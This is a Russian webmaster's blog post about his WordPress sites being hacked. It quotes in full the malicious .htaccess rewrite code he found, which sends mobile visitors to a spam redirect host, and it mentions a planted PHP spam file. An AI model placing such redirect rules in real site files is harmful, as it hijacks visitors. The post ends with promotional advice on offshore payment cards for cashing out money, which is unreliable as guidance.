Главная › Новости

Что делать если сайт заражен?

Опубликовано: 01.09.2018

Как удалить вирус с андроида, если он заразил ваше устройство

Вчера у меня произошло не очень приятное происшествие - заразили все мои сайты. Хорошо, что я был за компьютером и сразу заметил проблему. Что произошло?

Один мой сайт стало вдруг перебрасывать на какой то сайт знакомств, неприличный сайт, мягко говоря. При переходе на мой домен тут же шёл редирект на этот спамерский сайт.

Это очень плохая ситуация, так как если сразу не решить проблему, то вы можете распугать посетителей. А если это продлится долго, то поисковые системы могут наложить на ваш сайт фильтр и вы потеряете все позиции в поиске.

Удаляем вирусы в браузере, левые сайты и рекламу

Что делать если сайт заражен?

 

Я уже писал как то о том, как найти вирус на сайте , но в данном случае требовалось найти вирус быстро. Я тут же стал искать вредоносный код вручную.

Так как переадресация шла со всех страниц, то я подумал, что какой скрипт мне внедрили в шапку (header.php) или подвал (footer.php). Но там постороннего кода не было.

Что делать если антивирус заражен вирусом

Я тут же связался со службой поддержки хостинга:

 - У меня сайт такой то, стал переадресовываться на какой то неприличный ресурс, помогите решить проблему.

Но не успели они мне ответить, как я сам догадался куда ещё нужно посмотреть. В файле .htaccess, который находится в корне сайта, я обнаружил вот такой код:

RewriteEngine On RewriteBase / RewriteCond %{HTTP_USER_AGENT} android|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|pad)|iris|kindle|lge |maemo|meego.+mobile|midp|mmp|netfront|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(di|rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-) [NC] RewriteRule ^$ _http://luxurytds.com/go.php?sid=1 [R,L] # BULLETPROOF .50.8 >>>>>>> SECURE .HTACCESS

Как только я его удалил, все стало работать как нужно. На все у меня ушло 5 мин. Но если бы на моем месте был полный новичок, то у него на это могла бы уйти куча времени, если бы он вообще смог найти проблему сам.

К своему ужасу я обнаружил, что подобным образом заразили все мои сайты. Я тут же устранил проблему и написал в поддержку хостинга:

 У меня все сайты заразили, значит заразили и все на вашем хостинге, не плохо было бы предупредить народ.

На что последовал ответ:

 "Заразили" только файлы Ваших сайтов. Следовательно, в каком-то (каких-то) из Ваших сайтов имеются уязвимости, которую(ые) использовали для изменения файлов на аккаунте. Вам нужно обратиться к веб-разработчику для поиска и устранения этих уязвимостей.

Может и так, не проверить. Это уже не первый случай, когда мои сайты на этом хостинге пытаются заразить. Неужели у всех вебмастеров такие проблемы? Или это только на моём хостинге?

Это мой не первый хостинг и нигде у меня не было таких проблем. Все больше склоняюсь к том, чтобы сменить хостинг, к примеру на ЭТОТ.

Не успел я решить эту проблему, как техподдержка написала мне, что другой мой сайт рассылает спам. Как оказалось, мне в папку с одним плагином залили посторонний php файл, и через него как то слали спам.

Я удалил этот файл, и проблема решилась. У меня уже чётко складывается впечатление, что WordPress - это тот же Windows, и что с этим делать ?

СОВЕТ ВЕБМАСТЕРУ: Умение зарабатывать в интернете - это только пол дела, вторая половина - это умение ВЫГОДНО обналичивать электронные деньги. Вот список офшорных банковских карт, на которые можно выводить средства и потом снимать с них хрустящие купюры:

1. Epayments - можно открыть счет в долларах, евро и рублях. Формально банка нет, юридический адрес в Лондоне, но можно получить реквизиты банка в Латвии.

2. AdvCash - Офшорный банк находится в Белизе, можно открыть счет в долларах, евро, фунтах и рублях.

3. Payeer - Штаб квартира этой платежной системы находится в Грузии, тут так же можно открыть счет в долларах, евро и рублях.

4. Capitalist - Можно создать счета в долларах, евро и рублях. Низкие тарифы на вывод. Компания зарегистрирована в юрисдикции Британских Виргинских Островов.

Во всех случаях можно заказать банковскую карту, которую пришлют вам по обычной почте. Активируете ее и идете снимать деньги банкомат! Тарифы смотрите на сайтах платежных систем.